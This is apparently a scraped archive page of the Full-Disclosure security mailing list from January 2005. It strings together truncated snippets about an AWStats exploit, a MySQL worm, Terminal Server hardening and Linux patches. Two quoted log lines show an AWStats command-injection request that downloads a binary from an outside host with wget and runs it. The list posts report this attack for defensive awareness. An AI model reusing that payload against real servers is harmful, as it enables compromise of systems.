> I don't have the time to investigate the "cgi" and "dc" binaries.
> The "cgi" at least tries to daemonize and opens a TCP listening socket.
> They also try to replace the index page on the vulnerable site.
cgi
1495 1495 0 /dev/tty
149E 149E 0 socket
14AA 0
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: evolution
Advisory ID:
Various chapters of NC-2600 (Raleigh, Wilmington, Charlotte,
Asheville, etc) are proud to announce the coming of:
"CarolinaCon-2005"
The event will be June 10th-12th in Raleigh, NC.
If interested in attending and/or presenting, please see the
following link for existing and emerging details:
http:
On Thu, 27 Jan 2005 11:51:08 -0500 (EST),
[EMAIL PROTECTED]
> Message: 8
> Date: Thu, 27 Jan 2005 00:18:21 -0500
> From: Mike Bailey <[EMAIL PROTECTED]>
> Subject: [Full-Disclosure] spoolcll.exe - new worm being distributed
> via mysql vulnerability?
> To: full-disclosure@lists.netsys.c
Title: Re: [Full-Disclosure] Terminal Server vulnerabilities
>> But I would point out something much more important :
there are many>> more local exploits than remote (on Windows just like
any other OS). Local exploits : about 1-2 a
month>> * POSIX - OS/2 subsystem exploitation>> * De
> No I would not I would use an ids with properly tuned sigs for the terminal
> server abd then connect the terminal server via a proxy like vnc running
> something over freebsd or linux. I would never allow a windows terminal
> server to be directly be connected to the net...
Spot the two obviou
I have 2 servers running FC2, with xinetd-2.3.13-2 and proftpd-1.2.10-8.1.fc2.dag. The ftp servers are configured to run through xinetd.
xinetd is configured with "cps = 25 30", which is the default.
If I flood ftp connections, xinetd behaves like expected:
Jan 27 15:25:35 horus xinetd[628]: D
>It's also only possible when you've got NetBIOS/CIFS open to
>the Internet,
Yes I know... That is why I said security thru obscurity
> With this argumentation, you could sell your firewalls.
No I would not I would use an ids with properly tuned sigs for the terminal
server abd then connect t
On Thu, 27 Jan 2005, Brad Spengler wrote:
> I guess anyone who thinks that taking a hardcoded exploit and running it
> 256 times would always result in a successful exploit is stupid.
It would not always result in a successful exploitation; just as flipping
the coin twice is not a guarantee of ge
> I think the joke is on you in this case. There is a large patch series of
> which you judge the first steps only. Those steps introduce the
> infrastructure and concepts into the kernel, and later patches will tweak
> the exact numbers to values with more entropy. ONCE THEY EXISTING
> INFRASTRUCT
Delian Krustev wrote:
There's an exploit in the wild. Here's what it does:
200.96.166.252 - - [26/Jan/2005:06:32:00 +] "GET
/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00
HTTP/1.1" 200 538 "-" "Mozilla/4
>From the article text:
"The bot uses the "MySQL UDF Dynamic Library Exploit". In order to
launch the exploit, the bot first has to authenticate to mysql as 'root'
user. A long list of passwords is included with the bot, and the bot
will brute force the password."
Looks like this is small part ex
my firewall alerted me that a program called spoolcll.exe
the worm created a service called "evmon"
The only information about this worm on google is a discussion at the
following url:
http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
they are beginning to determin that it is being di
Definitly confusing but I believe it stems from a week root passwd.
"the bot first has to authenticate to mysql as 'root'
user." then it seems to launch the exploit allowing it access to
create the dynamic libraries containing User Defined Functions.
On Thu, 27 Jan 2005 11:47:57 -0600, Dolan, Pa
On Thu, Jan 27, 2005 at 11:10:43AM -0500, Brad Spengler wrote:
> Just wanted to point out to you guys the INCREDIBLE advances in Linux
> security underway on LKML from security expert Arjan van de Ven:
>
> http://lkml.org/lkml/2005/1/27/62
>
> On the subject of his i386-only mmap randomization p
Dear List ,
Watch out for "Spoolcll.exe" or "connect"s to Port 3306.
http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
http://isc.sans.org/index.php
--
Thierry Zoller
http://www.sniff-em.com/secureit.shtml
___
Full-Disclosure - We believe
On Jan 25, 2005, at 22:57, Rembrandt wrote:
On Tue, 25 Jan 2005 21:51:01 -0700
Mandrake Linux Security Team <[EMAIL PROTECTED]> wrote:
Dear Mandrake Linux Security Team,
Why can't you spam another mailinglist?
Or create an own for your PATCHES
It nerves to get more then one mail from you at mon
Check out todays diary at SANS.
http://isc.sans.org/
On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <[EMAIL PROTECTED]> wrote:
> Aloha,
>
> Earlier tonight, i was sitting here at home doing some normal
> browsing, and work and my firewall alerted me that a program called
> spoolcll.exe was atte
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
NSFOCUS Security Advisory(SA2005-01)
Topic: Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
Release Date: 2005-01-27
CVE CAN ID: CAN-2004-1150
http://www.nsfocus.com/english/homepage/research/0501.htm
Affected systems & software
Hi,
I am looking for a security contact in Vonage (www.vonage.com). I have tried
more than once to call their number, and have stopped waiting after 15minutes
of being put on hold.
--
Noam Rathaus
CTO
Beyond Security Ltd.
http://www.beyondsecurity.com
http://www.securiteam.com
__
Just wanted to point out to you guys the INCREDIBLE advances in Linux
security underway on LKML from security expert Arjan van de Ven:
http://lkml.org/lkml/2005/1/27/62
On the subject of his i386-only mmap randomization patch:
The randomisation range is 1 megabyte (this is bigger than the stack
See Security, Research and Development
www.see-security.com
--
[-] Product Information
SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can
* [EMAIL PROTECTED] (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +] "GET
> /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%2
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Maybe you should contact the Slackware maintainer(s) regarding this.
FD has no control over slackware or any other distributions.
[]s
On Wed, Jan 26, 2005 at 02:57:00PM -0200, Carlos de Oliveira wrote:
> Hi there!
>
> I've seen linux distributions
In addition,
You can install cygwin(www.cygwin.com) with openssh and tunnel terminal
services through openssh(very simple to do with putty). And then use your
router or firewall to block port 3389.
-Eddie B.
On Tue, 25 Jan 2005 14:38:30 -0600, Curt Purdy wrote:
> The problem with terminal s
> There are ways to find out the usernames that are admin they begin with 500_
> ( do a Google search if you want )
>
> Any script kiddy worth his salt will tell u this... So this one is off
> because renaming admin account will only be security thru obscurity witch is
> not good for the internet.
>I've seen linux distributions sometimes posting here on
>full-disclosure it's security updates.
Guys I always wanted to bring this up why do we have to send the updates to
this list ? Why not make aother list just for this or anyone who wants the
security alerts could get them directly from the o
On Thu, 27 Jan 2005 09:00:39 +0100, "Nicolas RUFF (lists)" said:
> But I would point out something much more important : there are many
> more local exploits than remote (on Windows just like any other OS).
>
> Local exploits : about 1-2 a month
> * POSIX - OS/2 subsystem exploitation
> * Debuggi
>Of course, one of the very first things you should do on a Windows box
>is rename the administrator account, so this kind of blind
>brute-forcing is not possible.
There are ways to find out the usernames that are admin they begin with 500_
( do a Google search if you want )
Any script kiddy
On the home page www.slackware.com read the news:
/*
2004-11-27
Pat made a new entry in the ChangeLog giving us all some fresh news about his
health conditions.
He also stated (Pat's gpg signed message) that the security packages (patches)
from the GUS-BR group (GUS GPG KEY) are trusted.
EDITE
ADVISORE 01 15/01/2005
INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORE
http://www.intruders.com.br/
http://www.intruders.org.br/
ADVISORE/0105 - UEBIMIAU < 2.7.2 MULTIPLES
VULNERABILITIES
PRIORITY: HIGH
I - INTRODUCTION:
>From http://www.uebimiau.org/
"Ueb
On Thu, Jan 27, 2005 at 04:54:09AM -0500, ntx0f wrote:
> I could be wrong but on my system it's not a suid binary, how's this a
> local root?
Maybe, by using some jedi mind tricks ? ;)
--
* Wojciech Pawlikowski :: :: NIC-HDL WP5161-RIPE *
* http://ducer.w00nf.org :: http://www.knockdownhc.com
I could be wrong but on my system it's not a suid binary, how's this a
local root?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Hello,
I agree with everyone that TS is prone to MiTM attacks, since there is
no server authentication at all.
Have a look at RDESKTOP sources and you will see a plaintext key
exchange at the beginning of the TS session. I suspect this key is
related to the L$HYDRAENCKEY_xxx LSA secret.
34 matches
Mail list logo